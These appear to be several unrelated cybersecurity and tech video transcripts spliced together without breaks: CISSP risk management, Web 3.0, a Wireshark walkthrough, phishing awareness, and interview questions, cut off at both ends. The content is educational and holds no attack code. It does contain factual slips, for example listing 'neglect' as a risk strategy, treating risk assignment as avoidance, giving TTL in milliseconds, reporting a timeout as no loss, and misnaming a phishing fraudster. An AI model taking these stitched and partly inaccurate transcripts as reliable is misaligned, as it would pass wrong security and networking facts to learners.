industry based on whatever they are doing. For risk management, we come to frameworks. The frameworks are used to categorize information systems so that we can identify threats or risks based on the classification. So this classification helps us determine the criticality and the sensitivity of information system, right? So what is the sensitivity and criticality? It basically gives us an understanding of the value of the asset that we have. So if you go back to domain 1, the asset value or the asset identification, asset security, that's where it comes into the picture. Obviously, a database server is going to be more secure than an end user laptop based on the data that they have. Thus, the criticality of the system for a database is much higher than an end user's laptop. Then we look at the security controls that can be implemented. Then for those, the frameworks like ISO 27001 comes into the picture. There is COBIT, there are a lot of frameworks out there, NIST 800-53. Then we talk about assessing the security controls. Once we have placed those security controls, we need to verify those controls are placed properly. They actually mitigate the risk and are appropriate to correctly mitigate that particular risk that they are created. Then looking at authorizing information systems, grant information systems operations based on risks determined. So you have identified risks, you have authorizing some of the devices to function in a particular manner based on which some of those risks would be mitigated or would be reduced to an acceptable level. So in the CISSP, we talk about a lot of risk assessment strategies. We look at how we can manage risks, The 4 different types of managing risks would be: one is to mitigate, other is to transfer, the third is to accept it, and the fourth one is to neglect the risk. So in the CISSP, it talks in great details about those risk assessment strategies. We are talking about the 4 types of risk mitigating strategies. They are risk avoiding or avoiding the risks, accepting the risk, transferring the risk, and limiting the risk. So in the course, we basically talk about a lot of risk strategies and how to mitigate these risks, and how they can be implemented to bring down to an acceptable level. So again, risk acceptance, risk appetite of an organization comes into the picture. These terms are then discussed in the training to understand how the policies would work around the risk management strategy. Moving on, then looking at monitoring security controls. So once we have security controls in place, we have assessed them, we also need to monitor them for the effectiveness, and though they are going to create any alerts or any risks are being realized, or any new risk that may be created by the security control implementation. So in these risk assessment, these are the frameworks, these are the steps that we want to follow to identify, mitigate, and monitor these risks. So the management begins with risk assessment. What do you mean by risk assessment? Identifying the impact of the risk that the risk would have on the organization. And there would be 2 different ways to assess the risk: a quantitative assessment or a qualitative assessment. A quantitative assessment is more quantifiable or is numerical in its process, where you're looking at assigning costs to particular assets and the threats. So the losses that you may figure out in a risk assessment strategy would be more numerical, where would be in a currency format, where let's say a risk, if realized, would lead to a loss of a X amount of dollars. That's where the quantitative analysis comes into the picture. The qualitative analysis would be quality of a service. So if a service is being affected because of a risk, what is the degradation of that service? To what aspect is it getting degraded? For example, internet that we use. If there is an internet outage, or if there is a reduction in internet speed, right? So if I've got a 10 Mbps line and now because of some fault of the ISP, it gets reduced to 4 Mbps, I may not be able to conduct the business that I was doing on a 10 Mbps line. Thus the quality of that device has degraded. Thus it is a risk and it is causing me losses, right? So qualitative risk analysis would be more descriptive in nature rather than be numerical in nature. Most of the companies or organizations would follow a hybrid policy because it is not possible to have a quantitative risk analysis in each and every scenario. Newer organization which doesn't have much data to rely on, historical data of how threats have affected that particular organization, may go in for a qualitative one, and as they mature over time in the security practices, they may then turn over to a quantitative risk analysis or a hybrid risk analysis, where they're using a combination of quantitative and qualitative both. Thus, the risk controls that we are talking about: risk acceptance, risk reduction, and risk assignment. There is risk avoidance as well. So there are 4 controls. The risk reduction is where you have implemented a security control based on which the risk has been reduced to a more acceptable level. Risk assignment is where you're also known as risk avoidance. That's where you're avoiding risk by outsourcing it. So talking about risk controls again, the 4 types being accept, avoid, transfer, and reduce. Risk acceptance is where the organization is willingly accepting the risk as the way it is because they don't want to deal with it right now. They might deal with it in the next iteration, or it is at an acceptable level and the company just wants to move on. Avoiding the risk is where you are going to try to not use the service where the risk exists. Thus, avoiding is where you have identified a particular service where the risk exists and now you're not using the service to avoid the risk altogether. Risk limitation or risk reduction would be where you are implementing a security control to mitigate the risk. And then risk transference is where risk assignment comes into the picture, where you are transferring it to a third party, like outsourcing it by using insurance to limit the risk. So for example, the threat is of a fire, the risk is high, but you cannot do anything about it. So you purchase insurance. So if the fire actually happens, you would still be reimbursed for the losses that you have faced. Coming back to countermeasures, we have discussed administrative countermeasures. These are policies, rules, regulations, laws, customs that a company needs to adhere to based on the industry that they are in. Then there are technical controls, software controls, anything that is technical in nature, IDS, IPS, firewalls, encryption, anything that is going to help you implement the CIA. And then physical, where you would look at locks on doors, security guards at fences, where they're preventing access to unauthorized people. Let's talk about roles and responsibilities of management. Now, as far as management is concerned, or the hierarchy is concerned, you can see on the screen there's a senior management, the security professional, data owner, custodian, and user. Now, these are from exam perspective, from the certification perspective. Obviously, the hierarchy in an organization would be slightly different. But here, the senior management is the responsible party for the entire security mechanism. So they must drive the entire security program. So CISSP talks about a top-down approach where the senior management has realized the importance of security and is implementing at all levels within the organization. Thus, they are a part of it and they are supporting the security program. They define the tolerance of risk, of how much risk is to be tolerated by an organization from a monetary perspective or the qualitative perspective as well, depending on the laws, legislations, regulations, compliances, and the contracts that the business has signed. They will rely on security professionals to manage the risk, but the exercise and the management process has to be defined by the senior management. Once the security team comes up with the countermeasures, the senior management either approves or disapproves them based on the return on investment of that countermeasure. The security professional assists with the development of policy documents, gives their inputs because they are the people who are in the day-to-day process of dealing with these. Thus, they can identify gaps and give good inputs to modify or to create the policy in a more robust manner. The security professionals may be a part of the risk assessment and risk management team as well, especially the security technical aspects of it, assist with the implementation and maintenance of countermeasures. So the administrative, technical, or physical measures that you have identified, you may be requested to implement that. For example, the locks that we have on the door, the swipe locks, they are connected to a database where the database is maintained. So as a security professional, you wouldn't be responsible to fit those locks, but to create the database, manage and maintain the database where that information is kept upon, where people are authorized and authenticated, and would be responsible for monitoring, auditing, and security assessments as well. The data owner, the owner of that particular data part, would normally be the head of the department. For example, the sales data is normally owned by the director of sales of that department, so that they would be ultimately responsible for identifying that data, classifying that data, and accepting the security controls that are implemented. They may request for additional security controls if they deem fit. The security professional implements these security controls. Then the custodian, a person who is responsible for implementing the approved security controls or managing the day-to-day activity of the security controls. For example, the security professional has identified an access control to be implemented on a data set that the data owner owns. The data owner has approved of it. It is the custodian who is going to implement that strategy or implement the control on it. The user is basically the user who or the person who accesses the information and IT resources. Thus, whatever access controls have been implemented would identify the user, authenticate, authorize them, and hold them accountable for whatever they are doing. If the user is unable to authenticate, access would be denied.
So in this digital landscape, we witness a profound evolution from the static pages of Web 1.0 to the interactive platforms of Web 2.0. But what exactly distinguishes Web 3.0 from its predecessors? Web 3.0, the next stage, is like a highway. It's built on decentralization, meaning users are in control, not big companies. So in this video on what is Web 3.0, we will cover what is Web 1.0 and Web 2.0, how is Web 3.0 different from them, which all technologies use Web 3.0, features, and Web 3.0 use cases and applications, and much more. So before understanding Web 3, let's understand what are Web 1 and Web 2. So imagine the internet as a big playground. Web 1 was like the first version of this playground. It started in the 1990s and went on to early 2000s. During this time, people mainly used the internet to read stuff on web pages and talk to each other. It was like reading a book for chatting with friends, but on a computer. Web 1 was built on something called open protocols, which basically means it was set up in a way that anyone could join and share information. It was like having a big party where everyone could come and chat.
As time went on, people started using the internet for more things like buying and selling stuff, that's e-commerce, and doing research. But mostly, it was kind of like a one-way street with people mostly just reading stuff. Then came Web 2, which was like an upgrade to Playground. This happened in the mid 2000s with Web 2. Suddenly, people could do more than just read stuff. They could create their own content like posting pictures, sharing stories, or writing on blogs. Companies like Facebook, Twitter, and Wikipedia popped up during this time. They made it super easy for people to create and share their own stuff. But there was a catch. Even though these platforms were free to use, users didn't always realize that they were giving away some of their personal information in exchange. So yeah, this was about Web 1 and Web 2. Now let's talk about how is Web 3 different from Web 2. So in the Web 2 era, big tech companies hold the reins over transactions, content, and data. But with the emergence of Web 3, things could change. Supporters of Web 3 believe that users will gain control over their own information without relying on middlemen like we do now. This shift could shake up how information gets handled, how money flows on the internet, and maybe even how online companies operate. Another big difference is how trust works. In Web 2, when you do something like send money or share information, you need to trust the other person and often a middleman too to handle your data safely. But in Web 3, trust works differently. Here, transactions only happen if certain conditions are met and the data is confirmed. No need for users to trust each other directly. Web 3 operates on a decentralized system, meaning there is no central authority controlling everything. Instead, transactions are verified and executed automatically by computer programs called smart contracts. The concept of blockchain technology, which is essentially a secure and transparent digital ledger. Every transaction made on the Web3 network is recorded on the blockchain, creating a permanent and tamper-proof record of activity. Alright, so this was about how is Web3 different from Web 2. Now let's have a look at the features of Web 3.0. So Web 3, the next evolution of internet, boasts several distinctive features that set it apart from its predecessors. So first is cryptocurrency enabled. One of the defining features of Web 3 is its integration of cryptocurrency into its framework. Cryptocurrencies such as Bitcoin and Ethereum serve as the native digital currencies for transactions within the Web3 ecosystem. These decentralized digital currencies enable peer-to-peer transactions without the need of intermediaries, fostering a more inclusive and efficient financial system. The next is decentralized. So in Web3, decentralization is a key. Unlike Web 2, where power is concentrated in the hands of few centralized entities, Web 3 operates on a decentralized network of nodes. This decentralized architecture ensures that no single entity has control over the entire network, promoting transparency, resilience, and censorship resistance. Alright, coming to the third, which is blockchain based. So Web 3 relies heavily on blockchain technology to secure record transactions. Blockchain, a distributed ledger technology, provides a tamper-resistant and transparent mechanism for storing transactional data. Each transaction on the Web3 network is cryptographically linked and recorded in a chronological order, ensuring immutability and transparency. Alright, then semantically organized. Yes, Web3 aims to organize information in a semantically meaningful way, allowing for more efficient, secure, and retrieval of data. Semantic organization involves structuring data in a way that enables computer to understand and interpret its meaning. By leveraging semantic technologies such as linked data and ontologies, Web3 enhances the interoperability and discoverability of information across the decentralized web. Alright, now coming to Web 3.0 use cases. So Web 3.0, the decentralized web, opens up the world of innovative use cases and applications that revolutionize how we interact and transact online. Here's a simple breakdown of some concepts. First is NFT, that is non-fungible tokens. NFTs are unique digital assets stored on a blockchain representing ownership of a specific item or piece of content, like digital art, collectibles, or virtual real estate. They enable creators to authenticate and monetize their digital creations, while buyers can own and trade these assets securely. Then there is DA apps, that is decentralized applications. So DA apps are applications built on blockchain networks, operating without a central authority. These apps offer various functionalities such as decentralized finance, DeFi, gaming, social networking, and more. DApps provide users with increased security, transparency, and control over their data and transactions. Then the next one is smart contracts. Smart contracts are self-executing contracts with predefined rules and conditions written in code. They automatically execute and enforce arrangements when specific conditions are met without the need for intermediaries. Smart contracts powers various decentralized applications and enable trustless transactions on blockchain network. Next one is DeFi. So DeFi or decentralized finance refers to financial services and applications built on blockchain networks, aiming to democratize and decentralize traditional financial systems. DeFi platforms offer services like lending, borrowing, trading, and asset management without relying on intermediaries like banks or brokers, providing users with greater financial autonomy and inclusivity. Alright, the next is DAOs, that is DAOs, Decentralized Autonomous Organizations. DAOs are organizations governed by smart contracts and operated by the members without centralized control. Members collectively make decisions and manage the organization's resources using transparent and decentralized voting mechanisms. DAOs enables collaborative decision making and resource allocation in a trustless and transparent manner. So this was about the use cases of Web 3.0. Now let's understand the advantages of Web 3.0. Alright, so here are the advantages. First one is enhanced privacy and security. So decentralized architecture reduces reliance on centralized servers, minimizing the risk of data breaches and unauthorized access. Next is financial inclusivity. Decentralized financial DeFi allows individuals worldwide to access financial services like lending, borrowing, and trading without traditional intermediaries. Next is innovation and creativity. Decentralized application, that is DApps, and non-fungible tokens enable creators to monetize their work and users to own unique digital assets, fostering innovation and creativity. Then there is transparency and trust. Smart contracts and decentralized autonomous organization, that is DAOs, ensures transparent and automated executions of agreements, fostering trust with the community and reducing the need of intermediaries. Alright, next one is global accessibility. So Web 3.0 breaks down geographical barriers, providing access to services and information to individuals worldwide, regardless of their location or background. So as we conclude our exploration of Web 3.0, we have journeyed through the evolution of Web 1 to Web 2 and now to decentralized landscape of Web 3.0. We have unraveled the distinctions between Web 2.0 and decentralization successor, delving into the technologies that underpin Web 3.0 and its myriad features. From enhanced privacy and financial inclusivity to innovative applications like DeFi and non-fungible tokens, Web 3.0 offers a transformative vision for the future of the internet.
Do you know, friends, that Wireshark is a powerful network protocol analyzer that helps you capture and analyze network traffic in real time? It allows you to deep dive into data packets traveling through your network, giving you insights into network performance, security, and troubleshooting. In this tutorial, we'll guide you through the basics of using Wireshark, from setting up your capture environment to interpreting the data. By the end of this tutorial, you'll have a solid understanding of how to navigate Wireshark interface, set of filters, and analyze the network traffic for different use cases. So guys, let's get started. So guys, let us start first by understanding what is Wireshark. So guys, Wireshark is a comprehensive open source network protocol analyzer that basically allows user to capture and analyze the data traveling over the network in real time. It is widely used by network administrators, security professionals, and also developers for various purposes. For example, guys, like network troubleshooting, where you have to identify and resolve network issues by examining the traffic patterns and diagnosing the connectivity problems. The next one is network analysis, which we'll also be doing in our hands-on, where you have to understand and optimize network performance by analyzing data flows and interaction between network systems. The third one is security auditing. You will also have to detect and investigate unusual or potentially malicious network activities such as unauthorized access or data breaches. And finally, you have a protocol development, where you can debug and develop network protocols by capturing and analyzing protocol messages and behaviors. The key features of Wireshark are: the first one is packet capture. Wireshark captures packets of data transmitted over the network. Each packet contains a wealth of information, including source and destination addresses. And also you get protocol, types, and payload data. So as you can see all over here, I've already downloaded Wireshark, and I'll guide you also how to download it. But as you can see, these are the lines that shows that the Wi-Fi packet graph is showing that this is how the packets are transmitting. So this is basically the real-time analysis what you can get through in Wireshark. Next one is you get a detailed inspection. Guys, Wireshark also decodes and displays data at various protocol layers. Example, you can get Ethernet, IP, TCP, HTTP, which allows for detailed examinations of network communications. You can also perform filtering and searching. Then you'll also get a chance to do data visualization, which includes features for visualizing network traffics such as flow graphs, as you can see all over here, and also statistics, which can help in understanding network behavior and performance. Wireshark is available for multi-operating systems, like for Windows, Mac OS, Linux, and many more. Now, there are certain scenarios where network security engineers use it. Suppose for network performance monitoring, where you track and analyze the performance of network applications and services. You also get an incident response. You investigate and respond to network security incidents by analyzing captured traffic. And you also do the protocol analysis, where you examine and troubleshoot network protocols and ensure proper implementation. Now, let us start with the Wireshark. So first, let us download the Wireshark. And before we download it, I expect that you would have got some brief idea regarding what is Wireshark. Now, what you have to do, guys, you have to go at this link, wireshark.org.download.html. So since I'm using Windows, so I have clicked on Windows x64 installer. Just right click on this. So as you can see, it will start downloading. So guys, since I've already downloaded it, I may not have to do it again. And the steps are very simple. Just you have to click yes, and it's going to download all the required dependencies and your installer will be ready. And after clicking all the OKs, you are going to get something like this. So this is your entry of the Wireshark network analyzer. Now, so as you can see all over here, you can capture the network packets from these interfaces. So you can see local area connection 10, adapter lookup, traffic capture, Bluetooth is there, then you have the Ethernets, okay? So let us choose the Wi-Fi as a network interface, okay? And just click on this. So as you can see all over here, so many of the packets have started running up, okay? And this is a shark icon. So basically, it is doing the real-time packet capturing where you have all these things. So now, let us try to understand what is there in Wireshark. So you can see you have file. Basically, for managing files, you have open, save, export. Okay, so these kind of options are there. You can also export the TLS session keys. Okay, you can export the objects and you can do print, quit. Then here in the edit, so edit, you can modify the preferences, settings, and profiles. If you talk about view, you can adjust the layout all over here of Wireshark. If you talk about go, you can navigate through the packets all over here. Then here is a capture. You can start or stop all over here. You can restart it. Then next is analyze. So as you can see all over here, you have display filters, display filter macros, display filter expressions, and many more. Okay. Similarly, you have statistics, okay, which helps in viewing network statistics and data summaries. Here you have telephony for using these kind of protocols, okay. Then you have wireless, okay. Then you have tools all over here, firewall, ACL rules, MAC address, okay. And there you have the help icon. So this is a very basic overview of this application. Now, let us do some basic exercises first. So let us try to capture a traffic first, okay. So since I've already selected our network interface as Wi-Fi, and let us restart it. So you can just go on capture and just start the restart. Okay. So this has started. Now go to your browser and just type, say, HTTP, okay, and say bin.org is the file. So guys, this is a basic website that we have requested on our browser, and let us go to our Wireshark and stop this for a moment. So as you can see all over here, this icon shows applying a display filter. Now go all over here and type the filter, say HTTP, okay, and you can say our filtering would be done. So as you can see, here you have the source, you have the destination, here you have the time, here you have the number, here you have the length of the packets, okay, and this is the info, okay. So now let us do the general analysis of the Wireshark output. So as you can see all over here, the first one is HTTP requests and responses. So as you can see, this is our source, okay. We are sending a request to the destination address with 44.219.81.240. The protocol is HTTP and the length of the packet is 480. And it is basically a GET request, okay. So get HTTP/1.1. Now there is a reply from this destination all over here and to the destination at our source. The protocol is still HTTP. Now the length of the packet is increased, is 887. And what we are getting, guys, all over here, that the status is 200 and it says okay. Now, as you can see, what we are getting basically an HTML file all over here, okay. Now, similarly, we are again requesting and we are getting a JSON file all over here. Now, getting a specific JSON HTTP 1.1 and similarly, reply is coming. So, as you can see, it's a to and from motion where we are requesting to a destination, which is the browser with the protocol HTTP. And similarly, we are getting a reply from our destination. So guys, this is our device and this is the given resource we are trying to access on our browser. So basically, now we can see these are the content types, which is text HTML for the HTML structure, okay. And also you can see all over here, this is a JSON type, okay. And these are the type of the content we are trying to access it, okay. And this is the request what we have done to our destination, which is the browser, okay, with the bin.org, and it is returning a text.html file. I hope so guys, you would have got a brief idea like how you can do the general analysis of the Wireshark output. Now let us try to do one more example, which will make our concepts more clear. Now guys, I will show you one more use case of this, that you can diagnose the network issues with ping and trace command. Okay, so with the help of Wireshark, this can also be done, guys. So what you need next is you can open a terminal, okay, and just right click all over here. And now in this, what we are going to do, guys, we are going to generate an ICMP traffic. So with the help of ping command. Okay, so now what we do, we type ping, say google.com. And you can see all over here, the request and reply have started. And now what we will do, guys, we will use the tracer command for tracing our packet flow. So you can see something we have got all over here. We will discuss about this bit later. Now let us open our Wireshark, okay. And what we'll do, guys, we will type ICMP, okay. And just click all over here. Okay. So guys, go to the filter and type ICMP, okay, and just click all over here. And but before that, you have to stop this. And now let us try. So you can see all over here that here the destination is showing unreachable, but here we are getting the reply. Okay. Now let us try to examine this protocol. Okay. So what all over here, let us try to understand first what we did in the terminal. Okay. So guys, when we are typing the command ping google.com, this command is basically testing the reachability of google.com by sending the Internet Control Message Protocol or ICMP echo request packets and waiting for the replies, which is echo response. Now guys, let us break down the ping results. So first three replies, we are going to see that each reply shows the IP address of 142.250.193.110, which is one of the Google servers. And you can see the round trip time latency for the packets. For the first time, it is showing around 76 milliseconds. For second round trip time, it is showing around 88. Then third is 99 and fourth one is 30 milliseconds. Now you can see there is something called time to live also. And in this case, the time to live for each packet is around 55 milliseconds. Okay. So basically this field indicates how many hops or routers the packet can pass through before being discarded. Okay. Now you can also see the request timeout. So the fourth packet is a request timeout, meaning no reply was received within this set time. And you can also see the ping statistics. So you can say here sent 4 packets, received 4 packets, and there is no loss. Okay, so this is one thing. And also approximate round trip in milliseconds. You can see minimum is 30 milliseconds and maximum is 99 milliseconds. Average is calculated 73 milliseconds. So this is statistics what we got. Now you can see all over here we have the traceroute command. Okay, so here no arguments are provided first. So let us try to understand. The D means do not resolve IP address to host names. Okay, where H means maximum number of hops of routers to search, and W means timeout in milliseconds for each reply. So suppose if I see traceroute google.com, so guys, this will show all the hops that the packet has to travel through reach the Google server, which will help to diagnose where the delays or issues might occur on the path. Now, you can see all over here, there are a lot of options are given. So similarly, you can read this. Now let us try to do the Wireshark analysis. So you can see all over here with our source 10.101.5.118, and we are sending the request to the Google server. And this is Internet Control Message Protocol. So you can see all over here, this is echo. This is a ping request with ID 0x001. And we can see the sequence is also given, the time to live, and we are replying in 7641 milliseconds. So this packet is basically what we are doing, guys. We are 7630 is our packet number, and this is what we are sending as a request. Then 7641 is a reply from the Google server with the given ID, okay, the sequence number of this and the time to live, and it is also giving the request one. Now what you can do, guys, you can also apply one filter all over here. We can, okay, now with the help of this, you can just see there are a lot of options as a filtering. Okay, so you can read the documentation for this, and whenever it is turning red, guys, it is showing something as error. Okay, and now let us do this and let us type our IP address, say 101, okay, 1.5.118. Okay, so this is also one of the way you can apply the filter. Okay, so it's going to filter out the IP address. Okay, say let's do this. So it is going to filter out our IP address, which is basically the same which is sending, because we have not given any other ping request. So guys, here what we can see, so this is kind of the analysis what we are doing basically. Okay, so guys, this was a Wireshark analysis for diagnosing the network issues with the help of ping and trace commands. And you can do a lot more other things with the help of Wireshark. Basically, these tools are used by network administrators, hackers, and also network engineers to understand the network performance, diagnose the network issues. Okay, so this was a short exercise which I've shown you about the basics of Wireshark.
Today, we are diving into a super important topic that affects everyone: phishing attacks. As cyber criminals get more sophisticated, it's important for us to stay one step ahead. So in this video, I'll be walking you through what phishing is, how it works, some famous examples of phishing attacks, different types of phishing, how to protect yourself, and what to do if you ever fall victim. So let's jump right in. What is phishing? To start, let's talk about what a phishing attack really is. In simple terms, phishing is a type of scam where hackers pretend to be legitimate people or companies to steal your personal information, whether it's your passwords, bank details, or even social security number. They typically do this through emails, text messages, or fake websites that seem genuine at first glance. But phishing attacks don't just rely on fake emails. They use a psychological trick known as social engineering. Now, social engineering is all about manipulating people into making poor decisions, like clicking on a malicious link or sharing personal information. Let's take an example. Imagine you work in a company and one day you get an urgent email from someone who looks like your boss. The email says, "I'm in a meeting right now, but I need you to send me the financial reports immediately. Click here to access a secure file." Because it's your boss and the message sounds urgent, you might not think twice and click the link. But that's where the trick is. The link wasn't real, and now the hacker has the access to the company's sensitive data. So social engineering works because it plays on human emotions like fear, urgency, trust, and leads you to make hasty decisions without double checking. So phishing attacks are serious business and they have caused some of the most damaging data breaches in history. Let's take a look at some of the most famous examples. First, let's talk about the Sony Pictures hack in 2014. This is one of the most well-known phishing incidents. It all started when Sony employees received phishing emails that looked completely legitimate. Some employees clicked on the links in these emails, which gave hackers access to Sony's internal network. And the result? Over 100 terabytes of data were stolen, including unreleased movies, confidential employee information, and thousands of internal emails. The leaked data caused major damage to Sony's reputation and led to lawsuits. It was one of the most costly cyber attacks of its time. Another incredible phishing incident involved both Facebook and Google. Between 2013 and 2015, a single hacker managed to scam these tech giants out of over $100 million. How did he do it? The hacker, Ddos, pretended to be a hardware supplier that both companies did business with. He sent phishing emails with fake invoices that looked exactly like the real thing. Because the emails were so convincing, the finance departments of the Facebook and Google didn't question them and wired the money directly to the attacker's account. So these famous examples show that phishing can affect anyone, from everyday people to major corporations. So let's talk about how they work step by step when hackers actually try to steal your information. So how does a phishing attack unfold? Let's break it into easy steps. Step 1. Phishing attacks typically start with a carefully crafted message, often in the form of an email or text. This message will look like it's from a legitimate company, like your bank, a popular service like PayPal, or even someone you personally know. Hackers usually use several techniques to make these emails look authentic. One common technique is domain spoofing. This is when hackers create a domain that looks almost identical to the legitimate website, but with subtle differences. For example, instead of paypal.com, they might use paypal1.com or pay-pal.com. Because most people glance at the sender's email address quickly, they don't notice the subtle change. The next step is to get the victim to visit a fake website. When you click on the link in the phishing email, you're often redirected to a website that looks exactly like the real thing. These fake websites are often designed to perfectly mimic the official login pages of services like your bank or email provider. To create these fake websites, hackers often use what's called a phishing kit. Now, phishing kits are pre-built tools that make it easy for attackers to clone real websites. The hacker then hosts the fake website on a malicious server or uses DNS spoofing, where they manipulate the DNS records to redirect users from the legitimate website to their fake version without the victim knowing. Now, once you land on the fake website, the next step is for the hacker to collect your information. So these fake pages are designed to look identical to the real ones. So when you enter your username and password, you think you're logging in securely. But hear what's happening in the background. Phishing sites use various methods to capture the information you type in. One common technique is form jacking, where the form on the website is modified to send the data directly to the attacker's server. Alternately, hackers can use key logging malware that records every keystroke you make, capturing usernames, passwords, and even credit card information as you type. So to make the fake site even more convincing, attackers often secure it with a real SSL certificate. Now this means the website might show up as secure with a padlock symbol in your browser, making you believe it's legitimate. So this is why it's important to check more than just the HTTPS in the URL. Now once the hacker has your data, they can use it in various ways. The most common method is using your stolen credentials to log into your accounts. This is known as credential stuffing. But they can also use your personal information for identity theft, or they might sell your data on the dark web. But phishing isn't a one-size-fits-all approach. Hackers use several different types of phishing attacks, and each one is designed for a specific target or method. So now let's talk about the different types of phishing attacks. First, we have general phishing, which is the most common and broad type. So in this type of attack, hackers send out thousands or even millions of phishing emails to random people, hoping that a small percentage will fall for the scam. For example, let's say you receive an email that looks like it's from a popular company like Netflix. The email says something like, your payment method has failed, click here to update your information. You click the link and it takes you to a fake Netflix login. When you enter your details, they are sent straight to the hacker. These attacks are sent out to as many people as possible. Whoever falls for it, falls for it. It's all about volume with general phishing. Next is spear phishing. So unlike general phishing, spear phishing is much more targeted. So the attacker picks a specific individual or company and tailors the attack to that person or group. So spear phishing requires some research and planning. So it's more sophisticated than general phishing. For example, imagine you work in the finance department of a company and you receive an email from someone pretending to be the CEO. The email says he's unable to transfer the money to the partner company and asks you to transfer it. So since it appears to be from your boss and it sounds urgent, you might be tempted to complete the transfer without questioning it. That's the goal of spear phishing. Because the email is personalized and often uses real names or insider information, it's much easier to fall for it. So this makes spear phishing especially dangerous for businesses. Now let's talk about whaling, which is similar to spear phishing but with a bigger target. So whaling specifically targets high-ranking individuals like CEOs, CFOs, or other executives. So these attacks are often highly sophisticated because the stakes are so high. Let's say a hacker sends an email to the CFO of a large corporation, pretending to be a lawyer representing the company. So the email contains a fake warrant, asking the CFO to click a link to download important legal documents. Because it's a legal matter and appears highly official, the CFO clicks the link, which leads to malware being installed on the company's network. So whaling attacks are dangerous because they often involve larger sums of money or more sensitive information. So when high-level executives fall for these scams, the consequences can be disastrous. Next comes SEO phishing. So SEO phishing takes a different approach. So instead of targeting individuals with emails or text messages, hackers create fake websites and manipulate search engines so that these sites show up at the top of search results. So people who are searching for services or products may unknowingly click on these malicious websites. For example, imagine you are trying to log into Bank of America and you search for Bank of America login. So a phishing site could show up at the top of the result, looking exactly like the original website. You fill out the form, entering your personal and payment information. But instead of going to the bank, all of that information goes straight to the hacker. So SEO phishing works because we trust search engines to lead us to legitimate sites. Hackers take advantage of that trust by manipulating search engine algorithms to display their malicious sites. And finally, there's smishing, which stands for SMS phishing. Smishing involves sending fraudulent messages through SMS or text. So these texts often appear to come from a trusted source, like your bank or a delivery service, and contain a link that leads to a phishing site. For example, let's say you get a text that looks like it's from a delivery company such as FedEx, telling you to set your delivery preferences. The message includes a link to do the same. When you click the link, it takes you to a fake FedEx site that asks for your name, address, and credit card information to cover delivery fees. So smishing is effective because people tend to trust text messages more than emails, especially when they're on the go and may not scrutinize the message as closely. Anyways, fortunately, there are several things you can do to protect yourself from phishing attacks. So first and foremost, always think before you click. If you get an email or text asking you to click a link, stop and think. Does this look suspicious? Hover over the link to see where it actually leads before you click. Next, don't upload personal information online. Be careful where you share your personal information online. Hackers often gather details from social media or public profiles to make their phishing attempts more convincing. So make sure to keep your software, operating system, and apps updated. Regular updates include security patches that protect against known vulnerabilities. Next is use antivirus and email security. Install a good antivirus program and use email services with phishing filters. These tools can block many phishing emails before they even reach your inbox. And lastly, use a secure DNS service. This can prevent you from even accessing malicious websites, adding an extra layer of protection. Now, even with these precautions, phishing attacks can sometimes be successful. So what happens if you're already fallen a victim? Let's talk about what to do after a phishing attack. So if you realize you have fallen for a phishing attack, don't panic. There are steps you can take to minimize the damage. First, report the attack to cybercrime authorities. In many countries, there are dedicated teams that handle online fraud, and the faster they are notified, the better. Next, change the passwords for any accounts that may have been compromised. Make sure each password is unique and avoid using the same password for multiple accounts. Next, enable multi-factor authentication on your accounts. MFA adds an extra step, like a code sent to your phone, which makes it harder for hackers to gain access. And lastly, run a full malware scan on your devices. If you clicked a link or downloaded something from the phishing attack, malware might have been installed. So it's important to remove it as quickly as possible. And there you have it. We have covered everything you need to know about phishing attacks, from how they work, the different types, to some real-life examples of phishing disasters, and most importantly, how you can protect yourself.
In this tutorial for today, we will explore the most frequently asked and important interview questions and answers for cybersecurity for all the different levels of proficiency, starting from freshers to experienced. Cybersecurity is crucial in today's digital world, protecting sensitive data from cyber threats and attacks. As cybersecurity risks grow, businesses are investing heavily in security measures, creating a surge in cybersecurity job openings. Roles in security analyst, ethical hacker, and SOC analyst are in high demand across all the industries. Professionals with skills in network security, penetration testing, and cloud security are highly sought after. Preparing for cybersecurity job interviews require knowledge of key topics like encryption, firewalls, threat detection, and risk management. Having a strong list of frequently asked questions will help you boost confidence and readiness. Strong cybersecurity awareness also helps individuals and organizations stay safe in evolving threats. Now, without further delay, let's get started with the cybersecurity interview questions and answers. That said, if these are the type of videos you'd like to watch, then hit that like and subscribe buttons and the bell icon to get notified. Now, let's begin with the first question. What is the role of DNS in cybersecurity? Now, the answer for this question is DNS, or also known as the Domain Name System, translate domain names into IP addresses. Attackers exploit it using DNS spoofing, cache poisoning, or tunneling into redirect users or exfiltrate data. Now, proceeding ahead, we have the next question. What is phishing? Provide an example. So, phishing is a social engineering attack where attackers trick users to revealing credentials via fake emails or websites. For example, a fake email from PayPal asking login details, or an email claiming to be from a bank requesting the recipient to provide their login credentials by clicking a link that leads to a fake website. Now, the next question is how encryption is different from hashing. Encryption converts data into ciphertext and can be decrypted back. Hashing is a one-way function that transforms data into a fixed-length hash, which cannot be reversed. Now, question number 4. What is a firewall and why is it used? A firewall monitors and controls incoming or outgoing network traffic based on security rules preventing unauthorized access and cyber threats. Now, proceeding to question number 5. What is a three-way handshake? It's a TCP process where a client and server establish a connection using SYN, ACK, and ACK packets, ensuring reliable data transmission. So basically, the client sends SYS, or also known as synchronized packet, to the server to check if the server is up or has open ports. The server sends SYN ACK packet to the client if it has open ports. Lastly, the client acknowledges this and sends back an ACK or acknowledgement packet back to the server. Proceeding ahead, we have the 6th question. What is a VPN and why is it used? A VPN, or also known as the Virtual Private Network, encrypts internet traffic, ensuring secured remote access and protecting data from interception. Now, the 7th question. What are the common techniques for securing a computer network? Techniques like firewalls, IDS or IPS, strong authentication, encryption, patch management, network segmentation, and endpoint protection are a couple of common techniques that can be used to secure a computer network. Proceeding ahead, we have the 8th question. Define the terms encryption and decryption. So the answer is, firstly, encryption. Encryption converts plain text into unreadable ciphertext. So the other end is the decryption, which reverses the process using a key to restore the plain text. Proceeding ahead, we have the 9th question. What are cookies in a web browser? So you can consider cookies as some specific details that are stored by the website to help you navigate to the website when you revisit the same website. So the answer is cookies are small data files stored in the browser to track users' session, preferences, and authentication. Malicious cookies can be exploited for tracking and session hijacking as well. Now, proceeding ahead, we have the 10th question, which talks about what is the difference between IDS and IPS. So firstly, IDS. IDS is also known as Intrusion Detection System, which monitors traffic for threats while IPS is intrusion prevention system, which actively blocks malicious traffic. Now, proceeding ahead, we have the 11th question. What is two-factor authentication? So for all of those you're already using Gmails or any of the email accounts and you want to log in from a remote location which kind of seems different to your browser, then you get a notification. Authenticate yourself via mobile or your phone, etc. Right? Send an OTP or some secured questions. So that is known as two-factor authentication. The security method requiring two independent authentication factors like a password or a one-time code to verify identity is called as two-factor authentication. Proceeding ahead, we have the 12th 